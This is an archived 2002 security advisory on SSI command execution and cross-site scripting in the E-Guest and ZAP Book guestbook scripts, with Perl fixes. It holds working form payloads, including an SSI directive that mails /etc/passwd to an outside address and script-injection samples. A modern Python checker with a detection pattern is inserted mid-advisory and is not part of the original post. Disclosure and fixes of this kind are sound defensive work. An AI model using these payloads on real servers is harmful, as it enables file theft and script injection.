SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)

From: DownBload (downbloadat_private)
Date: Sat Jun 29 2002 - 02:58:21 PDT


    
    [ DownBload Security Research Lab Advisory ]
    [-------------------------------------------------------------------------]
    Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
    Advisory number: 6
    Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
    ---[ E-Guest 
    Author: Leung Eric
    E-mail: cgiat_private
    Homepage: http://leungeric.com
    Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
    ---[ ZAP Book
    Author: Sephiroth32
    E-mail: sephiroth32at_private
    Homepage: http://www.unitedff.com
    
    Date: 28.06.2002
    Impact: remote user can execute shell commands (via SSI) and inject cross-site scripting (CSS) code
    Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
    Discovered by: DownBload
    Mail me @: downbloadat_private
    
    
    
    
    ======[ Overview
        
    --[ E-Guest is a "...full feature guestbook written in Perl...".
        Maybe a little too 'full feature' ;).
    --[ ZAP Book is a guestbook too, but more advanced than E-Guest.
    
    
    
    
    ======[ Problem
    
    It seems very hard to find a secure guestbook. ;)
    --[ The E-Guest author advertises "HTML tag filtering". That is true, but only
        the 'comment' field is filtered; the name, email, homepage and location
        fields are written to the guestbook page unfiltered, so SSI directives or
        CSS code placed in any of them are rendered (and, with SSI enabled,
        executed) by the web server.
    --[ ZAP Book is a different animal. In ZAP Book almost everything is
        filtered. The exception is the 'post' variable, which holds the user's
        comment, so SSI or CSS code placed in 'post' reaches the page unfiltered.
    
    
    
    
    ======[ Examples
    
    ---[ E-Guest
    
    SSI attack
    ~~~~~~~~~~
    Full Name: HI<!--#exec cmd="/bin/mail downbloadat_private < /etc/passwd"-->
    E-mail: downbloadat_private
    Homepage:
    UIN:
    Location: Beyond the light
    Comment: Nothing special, just SSI attack.
    
    CSS attack
    ~~~~~~~~~~
    Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>
    E-mail: downbloadat_private
    Homepage:
    UIN:
    Location: Beyond the light
    Comment: Nothing special, just CSS attack.
    
    
    ---[ ZAP Book
    
    SSI attack
    ~~~~~~~~~~
    Name: DownBload
    Email: downbloadat_private
    Homepage:
    Location:
    AIM Screename:
    MSN Email:
    Yahoo! Screename:
    ICQ Number:
    Referred by: Search Engine
    Entry: SSI attack <!--#exec cmd="/bin/mail downbloadat_private < /etc/passwd"-->
    
    CSS attack
    ~~~~~~~~~~
    Name: DownBload
    Email: downbloadat_private
    Homepage:
    Location:
    AIM Screename:
    MSN Email:
    Yahoo! Screename:
    ICQ Number:
    Referred by: Search Engine
    Entry: CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script>
    
    
    
    
    ======[ Solution
    
    As I said in the 'Makebook advisory', the solution for SSI and CSS attacks is
    filtering special characters out of user input before it is written to the
    guestbook page: once '<' and '>' are encoded as HTML entities, neither an
    SSI directive nor a script tag can be formed.
    
    ---[ E-Guest
    FIX: Add the following code to E-Guest_sign.pl (or wait for a fixed version :-):
    ...
    # Encode angle brackets in every unfiltered field, so that SSI directives
    # and HTML tags are shown as text instead of being interpreted.
    $fullname =~ s/</&lt;/g;
    $fullname =~ s/>/&gt;/g;
    
    $email =~ s/</&lt;/g;
    $email =~ s/>/&gt;/g;
    
    $homepage =~ s/</&lt;/g;
    $homepage =~ s/>/&gt;/g;
    
    $uin =~ s/</&lt;/g;
    $uin =~ s/>/&gt;/g;
    
    $location =~ s/</&lt;/g;
    $location =~ s/>/&gt;/g;
    ...
    
    
    ---[ ZAP Book
    FIX: Add the following code to addentry.cgi (or wait for a fixed version :-):
    ...
    # 'post' is the only field ZAP Book leaves unfiltered; encode its angle brackets too.
    $in{'post'} =~ s/</&lt;/g;
    $in{'post'} =~ s/>/&gt;/g;
    ...
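    The check below is an added example, not code from the advisory or from either
    guestbook. It is written in Python rather than Perl so it can be run
    stand-alone; the submissions, field names and e-mail address are constructed
    to mirror the examples above. It shows the point of the Problem and Solution
    sections: a filter applied to only some fields (E-Guest's 'comment', or
    everything except ZAP Book's 'post') still lets an SSI directive or script tag
    through, while encoding '<' and '>' in every field neutralises both. The
    `escape_field` helper goes one step further than the advisory's fix and also
    encodes '&' and quote characters, which matters when a field is placed inside
    an HTML attribute.

    ```python
    import html
    import re

    # Constructed sample submissions modelled on the advisory's examples
    # (hypothetical values, not captured from either application).
    E_GUEST_SUBMISSION = {
        "fullname": 'HI<!--#exec cmd="/bin/mail someone@example.invalid < /etc/passwd"-->',
        "email": "someone@example.invalid",
        "homepage": "",
        "uin": "",
        "location": "Beyond the light",
        "comment": "Nothing special.",
    }
    ZAP_BOOK_SUBMISSION = {
        "name": "Visitor",
        "email": "someone@example.invalid",
        "post": "Hello <script>alert('xss')</script>",
    }

    # Apache SSI directives look like <!--#exec ... -->; a literal '<' is required.
    SSI_DIRECTIVE = re.compile(
        r"<!--\s*#\s*(exec|include|echo|set|config|printenv|fsize|flastmod)\b", re.I
    )
    # Any HTML element tag, opening or closing.
    HTML_TAG = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)


    def escape_angle_brackets(value: str) -> str:
        """The advisory's fix, as in the Perl: s/</&lt;/g; s/>/&gt;/g."""
        return value.replace("<", "&lt;").replace(">", "&gt;")


    def escape_field(value: str) -> str:
        """Fuller encoding: also '&', '"' and "'", so the value is safe inside attribute values."""
        return html.escape(value, quote=True)


    def apply_fix(entry: dict, fields, escaper=escape_field) -> dict:
        """Escape only the named fields; models a script that filters some inputs but not others."""
        return {k: (escaper(v) if k in fields else v) for k, v in entry.items()}


    def suspicious_fields(entry: dict) -> list:
        """Names of fields that still carry an SSI directive or HTML tag; an empty list means clean."""
        return [k for k, v in entry.items() if SSI_DIRECTIVE.search(v) or HTML_TAG.search(v)]


    if __name__ == "__main__":
        # E-Guest as described: only 'comment' filtered -> 'fullname' still carries the directive.
        print("E-Guest, comment only:", suspicious_fields(apply_fix(E_GUEST_SUBMISSION, {"comment"})))
        # E-Guest with the fix applied to every field -> nothing left to interpret.
        print("E-Guest, all fields:", suspicious_fields(apply_fix(E_GUEST_SUBMISSION, E_GUEST_SUBMISSION.keys())))
        # ZAP Book: filtering 'post' with the advisory's two substitutions is enough for these inputs.
        print("ZAP Book, post:", suspicious_fields(apply_fix(ZAP_BOOK_SUBMISSION, {"post"}, escape_angle_brackets)))
    ```

    Run the file directly to print the three checks. As defence in depth on the
    server side, Apache's `Options IncludesNOEXEC` keeps server-side includes
    enabled but disables `#exec`, so a directive that slips past the script's
    filter cannot run a command.
    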
    
    
    
    
    ======[ Greetz
    
    Greetz goes to #hr.hackers <irc.carnet.hr>. 
    Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, 
    Fr1c, harlequin, Astral and www.active-security.org.
    Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his 
    stupid friend h4x0r.
    



    This archive was generated by hypermail 2b30 : Sat Jun 29 2002 - 09:30:36 PDT